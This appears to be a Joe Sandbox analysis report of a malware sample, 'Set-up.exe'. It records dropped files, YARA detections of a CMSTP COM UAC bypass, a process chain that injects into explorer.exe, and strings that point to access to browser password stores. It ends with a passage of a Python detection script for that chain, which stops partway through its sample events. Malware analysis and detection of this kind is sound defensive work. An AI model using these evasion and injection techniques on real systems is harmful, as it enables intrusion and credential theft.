Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Code function: 12_2_00427AD0
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Code function: 12_2_0065E250
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Code function: 12_2_0065B3E0
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Code function: 12_2_0065F440
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Code function: 12_2_00663CF0
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Code function: 15_2_0047B280
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Code function: 15_2_0047B5F0
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Code function: 15_2_0043F800
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Code function: 15_2_004319E0
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Code function: 15_2_0047B9A0
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Code function: 15_2_00427AD0
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Code function: 15_2_008B23E0
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Code function: 15_2_00908550
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Code function: 15_2_008749C0
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Code function: 15_2_008DEAE0
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Code function: 15_2_00880DB0
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\ASLFoundation.dll 61209252CA938A4E11CB665A2C2E8D258484433A620DD3F9200A224AAF59618B
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\ASLMessaging.dll 71C3E619E42F1BB56B879334358247C9BB24219E0A3CA12203CE720B765CC12F
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Code function: String function: 00651400 appears 36 times
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Code function: String function: 004A5BDE appears 88 times
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Code function: String function: 0048D050 appears 32 times
Source: Set-up.exe, 00000001.00000000.1203929923.00000000013D7000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameColorLib.exeH vs Set-up.exe
Source: Set-up.exe, 00000001.00000003.1744556998.00000000036F6000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameColorLib.exeH vs Set-up.exe
Source: Set-up.exe, 00000001.00000003.2077780463.00000000045F9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameDialogL.exeV vs Set-up.exe
Source: Set-up.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 18.2.explorer.exe.50a9b57.5.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 18.2.explorer.exe.50aa757.3.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 15.2.Server.exe.b278901.23.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 12.2.Server.exe.b3c7901.24.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 13.2.more.com.483db57.5.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 23.2.Server.exe.b4195ce.20.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 16.2.more.com.4465a8a.4.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 23.2.Server.exe.b3d3901.23.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 12.2.Server.exe.b40c9ce.22.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 15.2.Server.exe.b2bd9ce.21.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 16.2.more.com.44ab757.2.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 13.2.more.com.47f8a8a.2.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 12.2.Server.exe.b40d5ce.23.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 23.2.Server.exe.b4189ce.21.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 15.2.Server.exe.b2be5ce.24.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 18.2.explorer.exe.5064a8a.2.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 13.2.more.com.483e757.3.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 16.2.more.com.44aab57.5.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: classification engine | Classification label: mal100.troj.spyw.expl.evad.winEXE@17/57@6/12
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Code function: 15_2_009D8870 ?ParseDocument@MSXMLParseHandler@xml@dvacore@@UAE?AW4XMLParseStatus@23@ABV?$basic_string@GU?$char_traits@G@std@@V?$STLAllocator@G@SmallBlockAllocator@utility@dvacore@@@std@@@Z,CoCreateInstance,VariantClear
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Code function: 12_2_00425FF0 ?GetNativeModule@Module@ASL@@QBEPAUHINSTANCE__@@XZ,?GetNativeModule@Module@ASL@@QBEPAUHINSTANCE__@@XZ,FindResourceW,InterlockedDecrement,?Dispose@Allocator@ASL@@SAXPAXI@Z,?GetNativeModule@Module@ASL@@QBEPAUHINSTANCE__@@XZ,LoadResource,InterlockedDecrement,?Dispose@Allocator@ASL@@SAXPAXI@Z,LockResource,?GetNativeModule@Module@ASL@@QBEPAUHINSTANCE__@@XZ,SizeofResource,InterlockedDecrement,?Dispose@Allocator@ASL@@SAXPAXI@Z,FreeResource
Source: C:\Users\user\AppData\Local\Temp\K07BOQJSAWQXKEH8FTYNN.exe | File created: C:\Users\user\AppData\Local\config
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1684:120:WilError_03
Source: C:\Windows\SysWOW64\explorer.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\EMBW3N
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5844:120:WilError_03
Source: C:\Users\user\Desktop\Set-up.exe | File created: C:\Users\user\AppData\Local\Temp\K07BOQJSAWQXKEH8FTYNN.exe
Source: C:\Windows\SysWOW64\more.com | Process created: C:\Windows\SysWOW64\explorer.exe
Source: Set-up.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Set-up.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: Server.exe, 0000000C.00000002.2384291220.0000000000DE0000.00000002.00000001.01000000.00000011.sdmp, Server.exe, 0000000F.00000002.2451249381.0000000000DE0000.00000002.00000001.01000000.00000011.sdmp | Binary or memory string: INSERT INTO pcd_meta (key, value) VALUES ('schema_compatibility_version', 1);
Source: Server.exe, 0000000C.00000002.2384291220.0000000000DE0000.00000002.00000001.01000000.00000011.sdmp, Server.exe, 0000000F.00000002.2451249381.0000000000DE0000.00000002.00000001.01000000.00000011.sdmp | Binary or memory string: CREATE TABLE pcd_meta ( key TEXT NOT NULL, value TEXT NOT NULL, PRIMARY KEY (key) );
Source: Server.exe, 0000000C.00000002.2384291220.0000000000DE0000.00000002.00000001.01000000.00000011.sdmp, Server.exe, 0000000F.00000002.2451249381.0000000000DE0000.00000002.00000001.01000000.00000011.sdmp | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM ' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: Server.exe, 0000000C.00000002.2384291220.0000000000DE0000.00000002.00000001.01000000.00000011.sdmp, Server.exe, 0000000F.00000002.2451249381.0000000000DE0000.00000002.00000001.01000000.00000011.sdmp | Binary or memory string: CREATE TABLE ribs_payload ( payloadID TEXT NOT NULL, productFamily TEXT NOT NULL, productName TEXT NOT NULL, version TEXT NOT NULL, PRIMARY KEY (payloadID) );
Source: Server.exe, 0000000C.00000002.2384291220.0000000000DE0000.00000002.00000001.01000000.00000011.sdmp, Server.exe, 0000000F.00000002.2451249381.0000000000DE0000.00000002.00000001.01000000.00000011.sdmp | Binary or memory string: CREATE TABLE DependencyData( PayloadID TEXT NOT NULL REFERENCES Payloads (PayloadID),PayloadIDb TEXT ,type TEXT NOT NULL ,product_family TEXT, product_name TEXT, version TEXT, PRIMARY KEY (PayloadID,PayloadIDb,type,product_family,product_name,version));
Source: Server.exe, 0000000C.00000002.2384291220.0000000000DE0000.00000002.00000001.01000000.00000011.sdmp, Server.exe, 0000000F.00000002.2451249381.0000000000DE0000.00000002.00000001.01000000.00000011.sdmp | Binary or memory string: CREATE TABLE payloads( PayloadID TEXT NOT NULL, productFamily TEXT ,productName TEXT , version TEXT , signature TEXT ,installState INT NOT NULL DEFAULT 0, installTime INT, PRIMARY KEY (PayloadID) );
Source: Server.exe, 0000000C.00000002.2384291220.0000000000DE0000.00000002.00000001.01000000.00000011.sdmp, Server.exe, 0000000F.00000002.2451249381.0000000000DE0000.00000002.00000001.01000000.00000011.sdmp | Binary or memory string: CREATE TABLE ribs_payload ( payloadID TEXT NOT NULL, productFamily TEXT NOT NULL, productName TEXT NOT NULL, version TEXT NOT NULL, signature TEXT NOT NULL, PRIMARY KEY (payloadID) );
Source: Server.exe, 0000000C.00000002.2384291220.0000000000DE0000.00000002.00000001.01000000.00000011.sdmp, Server.exe, 0000000F.00000002.2451249381.0000000000DE0000.00000002.00000001.01000000.00000011.sdmp | Binary or memory string: CREATE TABLE ribs_payload_constraint ( payloadID TEXT NOT NULL REFERENCES ribs_payload (payloadID) ON DELETE CASCADE, payloadIDb TEXT NOT NULL, constraintType INTEGER NOT NULL, PRIMARY KEY (payloadID, payloadIDb, constraintType) );
Source: Server.exe, 0000000C.00000002.2384291220.0000000000DE0000.00000002.00000001.01000000.00000011.sdmp, Server.exe, 0000000F.00000002.2451249381.0000000000DE0000.00000002.00000001.01000000.00000011.sdmp | Binary or memory string: CREATE TABLE payload_data ( payloadID TEXT NOT NULL REFERENCES ribs_payload (payloadID), domain TEXT NOT NULL, key TEXT NOT NULL, value TEXT, PRIMARY KEY (payloadID, domain, key) );
Source: Server.exe, 0000000C.00000002.2384291220.0000000000DE0000.00000002.00000001.01000000.00000011.sdmp, Server.exe, 0000000F.00000002.2451249381.0000000000DE0000.00000002.00000001.01000000.00000011.sdmp | Binary or memory string: CREATE TABLE upgraded_payloads ( payloadIDOriginal TEXT NOT NULL , payloadIDUpgraded TEXT NOT NULL REFERENCES payloads (PayloadID), PRIMARY KEY (payloadIDOriginal, payloadIDUpgraded) );
Source: Server.exe, 0000000C.00000002.2384291220.0000000000DE0000.00000002.00000001.01000000.00000011.sdmp, Server.exe, 0000000F.00000002.2451249381.0000000000DE0000.00000002.00000001.01000000.00000011.sdmp | Binary or memory string: CREATE TABLE SuitePayloads( ProductID TEXT NOT NULL REFERENCES Suites (ProductID),PayloadID TEXT NOT NULL REFERENCES Payloads (PayloadID),PRIMARY KEY (ProductID, PayloadID) );
Source: Server.exe, 0000000C.00000002.2384291220.0000000000DE0000.00000002.00000001.01000000.00000011.sdmp, Server.exe, 0000000F.00000002.2451249381.0000000000DE0000.00000002.00000001.01000000.00000011.sdmp | Binary or memory string: CREATE TABLE upgraded_payloads ( payloadIDOriginal TEXT NOT NULL REFERENCES ribs_payload (payloadID), payloadIDUpgraded TEXT NOT NULL REFERENCES ribs_payload (payloadID), PRIMARY KEY (payloadIDOriginal) );
Source: Server.exe, 0000000C.00000002.2384291220.0000000000DE0000.00000002.00000001.01000000.00000011.sdmp, Server.exe, 0000000F.00000002.2451249381.0000000000DE0000.00000002.00000001.01000000.00000011.sdmp | Binary or memory string: CREATE TABLE ribs_collection ( collectionID TEXT NOT NULL, collectionPayloadID TEXT NOT NULL REFERENCES ribs_payload (payloadID) ON DELETE RESTRICT, tsInstalled INT, tsModified INT, PRIMARY KEY (collectionID) );
Source: Server.exe, 0000000C.00000002.2384291220.0000000000DE0000.00000002.00000001.01000000.00000011.sdmp, Server.exe, 0000000F.00000002.2451249381.0000000000DE0000.00000002.00000001.01000000.00000011.sdmp | Binary or memory string: INSERT INTO pcd_meta (key, value) VALUES ('schema_version', 1);
Source: Server.exe, 0000000C.00000002.2384291220.0000000000DE0000.00000002.00000001.01000000.00000011.sdmp, Server.exe, 0000000F.00000002.2451249381.0000000000DE0000.00000002.00000001.01000000.00000011.sdmp | Binary or memory string: CREATE TABLE EULA_Files( productID TEXT NOT NULL, langCode TEXT NOT NULL,eula TEXT NOT NULL,PRIMARY KEY (productID, langCode) );
Source: Server.exe, 0000000C.00000002.2384291220.0000000000DE0000.00000002.00000001.01000000.00000011.sdmp, Server.exe, 0000000F.00000002.2451249381.0000000000DE0000.00000002.00000001.01000000.00000011.sdmp | Binary or memory string: CREATE TABLE ribs_collection_payload ( collectionID TEXT NOT NULL REFERENCES ribs_collection (collectionID) ON DELETE CASCADE, payloadID TEXT NOT NULL REFERENCES ribs_payload (payloadID) ON DELETE RESTRICT, installState INT NOT NULL DEFAULT 0, tsInstalled INTEGER, PRIMARY KEY (collectionID, payloadID) );
Source: Server.exe, 0000000C.00000002.2384291220.0000000000DE0000.00000002.00000001.01000000.00000011.sdmp, Server.exe, 0000000F.00000002.2451249381.0000000000DE0000.00000002.00000001.01000000.00000011.sdmp | Binary or memory string: CREATE TABLE dependency_type( type INTEGER NOT NULL, description TEXT NOT NULL, PRIMARY KEY (type) );
Source: Server.exe, 0000000C.00000002.2384291220.0000000000DE0000.00000002.00000001.01000000.00000011.sdmp, Server.exe, 0000000F.00000002.2451249381.0000000000DE0000.00000002.00000001.01000000.00000011.sdmp | Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: Server.exe, 0000000C.00000002.2384291220.0000000000DE0000.00000002.00000001.01000000.00000011.sdmp, Server.exe, 0000000F.00000002.2451249381.0000000000DE0000.00000002.00000001.01000000.00000011.sdmp | Binary or memory string: CREATE TABLE Branding ( ProductID TEXT NOT NULL REFERENCES Suites (ProductID),resource_type TEXT NOT NULL,resource_data TEXT NOT NULL,PRIMARY KEY (ProductID, resource_type) );
Source: Server.exe, 0000000C.00000002.2384291220.0000000000DE0000.00000002.00000001.01000000.00000011.sdmp, Server.exe, 0000000F.00000002.2451249381.0000000000DE0000.00000002.00000001.01000000.00000011.sdmp | Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: Server.exe, 0000000C.00000002.2384291220.0000000000DE0000.00000002.00000001.01000000.00000011.sdmp, Server.exe, 0000000F.00000002.2451249381.0000000000DE0000.00000002.00000001.01000000.00000011.sdmp | Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: Server.exe, 0000000C.00000002.2384291220.0000000000DE0000.00000002.00000001.01000000.00000011.sdmp, Server.exe, 0000000F.00000002.2451249381.0000000000DE0000.00000002.00000001.01000000.00000011.sdmp | Binary or memory string: UPDATE pcd_meta SET value = 2 WHERE key = 'schema_version';
Source: Server.exe, 0000000C.00000002.2384291220.0000000000DE0000.00000002.00000001.01000000.00000011.sdmp, Server.exe, 0000000F.00000002.2451249381.0000000000DE0000.00000002.00000001.01000000.00000011.sdmp | Binary or memory string: CREATE TABLE dependencies( PayloadID TEXT NOT NULL REFERENCES payloads(PayloadID) ON DELETE CASCADE, PayloadIDb TEXT NOT NULL, type INTEGER NOT NULL REFERENCES dependency_types(type), PRIMARY KEY (PayloadID, PayloadIDb) );
Source: Server.exe, 0000000C.00000002.2384291220.0000000000DE0000.00000002.00000001.01000000.00000011.sdmp, Server.exe, 0000000F.00000002.2451249381.0000000000DE0000.00000002.00000001.01000000.00000011.sdmp | Binary or memory string: CREATE TABLE Suites( ProductID TEXT NOT NULL, group_name TEXT NOT NULL, group_family TEXT NOT NULL, display_name TEXT NOT NULL, PRIMARY KEY (ProductID) );
Source: Server.exe, 0000000C.00000002.2384291220.0000000000DE0000.00000002.00000001.01000000.00000011.sdmp, Server.exe, 0000000F.00000002.2451249381.0000000000DE0000.00000002.00000001.01000000.00000011.sdmp | Binary or memory string: CREATE TABLE payload_data ( PayloadID TEXT NOT NULL REFERENCES payloads (PayloadID), domain TEXT NOT NULL, key TEXT NOT NULL, value TEXT, PRIMARY KEY (PayloadID, domain, key) );
Source: Server.exe, 0000000C.00000002.2384291220.0000000000DE0000.00000002.00000001.01000000.00000011.sdmp, Server.exe, 0000000F.00000002.2451249381.0000000000DE0000.00000002.00000001.01000000.00000011.sdmp | Binary or memory string: CREATE TABLE collection_data ( collectionID TEXT NOT NULL REFERENCES ribs_collection (collectionID), domain TEXT NOT NULL, key TEXT NOT NULL, value TEXT, PRIMARY KEY (collectionID, domain, key) );
Source: Server.exe, 0000000C.00000002.2384291220.0000000000DE0000.00000002.00000001.01000000.00000011.sdmp, Server.exe, 0000000F.00000002.2451249381.0000000000DE0000.00000002.00000001.01000000.00000011.sdmp | Binary or memory string: CREATE TABLE user_actions ( product_id TEXT NOT NULL, actor TEXT , time_action TEXT NOT NULL);
Source: Server.exe, 0000000C.00000002.2384291220.0000000000DE0000.00000002.00000001.01000000.00000011.sdmp, Server.exe, 0000000F.00000002.2451249381.0000000000DE0000.00000002.00000001.01000000.00000011.sdmp | Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: Server.exe, 0000000C.00000002.2384291220.0000000000DE0000.00000002.00000001.01000000.00000011.sdmp, Server.exe, 0000000F.00000002.2451249381.0000000000DE0000.00000002.00000001.01000000.00000011.sdmp | Binary or memory string: CREATE TABLE PayloadData( PayloadID TEXT NOT NULL REFERENCES Payloads (PayloadID),domain TEXT NOT NULL,key TEXT NOT NULL,value TEXT NOT NULL,PRIMARY KEY (PayloadID, domain, key) );
Source: Server.exe, 0000000C.00000002.2384291220.0000000000DE0000.00000002.00000001.01000000.00000011.sdmp, Server.exe, 0000000F.00000002.2451249381.0000000000DE0000.00000002.00000001.01000000.00000011.sdmp | Binary or memory string: UPDATE upgraded_payloads SET payloadIDUpgraded = (SELECT second_upgraded.payloadIDUpgraded FROM upgraded_payloads AS first_upgraded INNER JOIN upgraded_payloads AS second_upgraded ON first_upgraded.payloadIDUpgraded = second_upgraded.payloadIDOriginal WHERE upgraded_payloads.payloadIDOriginal = first_upgraded.payloadIDOriginal) WHERE payloadIDOriginal IN (SELECT first_upgraded.payloadIDOriginal FROM upgraded_payloads AS first_upgraded INNER JOIN upgraded_payloads AS second_upgraded ON first_upgraded.payloadIDUpgraded = second_upgraded.payloadIDOriginal);
Source: Set-up.exe, 00000001.00000003.1779897782.0000000003D97000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000001.00000003.1779964890.0000000003D8D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: Server.exe, 0000000C.00000002.2384291220.0000000000DE0000.00000002.00000001.01000000.00000011.sdmp, Server.exe, 0000000F.00000002.2451249381.0000000000DE0000.00000002.00000001.01000000.00000011.sdmp | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM ' || quote(name) || ';'FROM sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: Server.exe, 0000000C.00000002.2384291220.0000000000DE0000.00000002.00000001.01000000.00000011.sdmp, Server.exe, 0000000F.00000002.2451249381.0000000000DE0000.00000002.00000001.01000000.00000011.sdmp | Binary or memory string: CREATE TABLE Payloads( PayloadID TEXT NOT NULL, payload_family TEXT NOT NULL,payload_name TEXT NOT NULL, payload_version TEXT NOT NULL,payload_type TEXT NOT NULL,PRIMARY KEY (PayloadID) );
Source: Server.exe, 0000000C.00000002.2384291220.0000000000DE0000.00000002.00000001.01000000.00000011.sdmp, Server.exe, 0000000F.00000002.2451249381.0000000000DE0000.00000002.00000001.01000000.00000011.sdmp | Binary or memory string: CREATE TABLE domain_data ( domain TEXT NOT NULL, subDomain TEXT NOT NULL, key TEXT NOT NULL, value TEXT, PRIMARY KEY (domain, subDomain, key) );
Source: Set-up.exe | Virustotal: Detection: 33%
Source: Set-up.exe | ReversingLabs: Detection: 50%
Source: K07BOQJSAWQXKEH8FTYNN.exe | String found in binary or memory: gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2stoplockedm: inconsistent lockingfindrunnable: negative nmspinningfreeing stack not in
Source: K07BOQJSAWQXKEH8FTYNN.exe | String found in binary or memory: eep-alive interval must be positivelfstack node allocated from the heapruntime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime:
Source: K07BOQJSAWQXKEH8FTYNN.exe | String found in binary or memory: f69vUBGv/addrselect.go
Source: K07BOQJSAWQXKEH8FTYNN.exe | String found in binary or memory: mePFrj3evm/addr.go
Source: K07BOQJSAWQXKEH8FTYNN.exe | String found in binary or memory: ucHJiE4/addr.go
Source: C:\Users\user\Desktop\Set-up.exe | File read: C:\Users\user\Desktop\Set-up.exe
Source: unknown | Process created: C:\Users\user\Desktop\Set-up.exe "C:\Users\user\Desktop\Set-up.exe"
Source: C:\Users\user\Desktop\Set-up.exe | Process created: C:\Users\user\AppData\Local\Temp\K07BOQJSAWQXKEH8FTYNN.exe "C:\Users\user\AppData\Local\Temp\K07BOQJSAWQXKEH8FTYNN.exe"
Source: C:\Users\user\Desktop\Set-up.exe | Process created: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe "C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe"
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Process created: C:\Windows\SysWOW64\more.com C:\Windows\SysWOW64\more.com
Source: C:\Windows\SysWOW64\more.com | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe
Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Process created: C:\Windows\SysWOW64\more.com C:\Windows\SysWOW64\more.com
Source: C:\Windows\SysWOW64\more.com | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\more.com | Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe "C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe"
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\rareTemp.exe "C:\Users\user\AppData\Local\Temp\rareTemp.exe"
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\rareTemp.exe "C:\Users\user\AppData\Local\Temp\rareTemp.exe"
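The process-creation lines above give the chain Set-up.exe -> Server.exe -> more.com -> explorer.exe, with conhost.exe as the only child more.com should ever have. The block below is an added detection example, not part of the Joe Sandbox report and not code from the sample, that rebuilds that chain from Sysmon-style process-creation records and flags the three parent/child relations a hunter would key on: a Temp-resident parent launching more.com, more.com launching anything other than conhost.exe, and explorer.exe started from a path other than C:\Windows\explorer.exe. The event records, pids and the benign control events are constructed to mirror the report; the directory markers, the LOLBin set and the expected explorer.exe path are tunable assumptions, not something the report states.

```python
"""Added example: flag the Set-up.exe -> Server.exe -> more.com -> explorer.exe
chain from constructed Sysmon-style process-creation events."""
from dataclasses import dataclass
import ntpath


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str        # full path of the created process
    cmdline: str = ""


@dataclass(frozen=True)
class Hit:
    rule: str
    pid: int
    chain: tuple      # image basenames from the outermost known ancestor to the flagged process


# Constructed sample telemetry modelled on the process tree in the report (pids invented).
EVENTS = [
    ProcEvent(1000, 1, r"C:\Users\user\Desktop\Set-up.exe"),
    ProcEvent(1100, 1000, r"C:\Users\user\AppData\Local\Temp\K07BOQJSAWQXKEH8FTYNN.exe"),
    ProcEvent(1200, 1000, r"C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe"),
    ProcEvent(1300, 1200, r"C:\Windows\SysWOW64\more.com"),
    ProcEvent(1310, 1300, r"C:\Windows\System32\conhost.exe", "conhost.exe 0xffffffff -ForceV1"),
    ProcEvent(1400, 1300, r"C:\Windows\SysWOW64\explorer.exe"),
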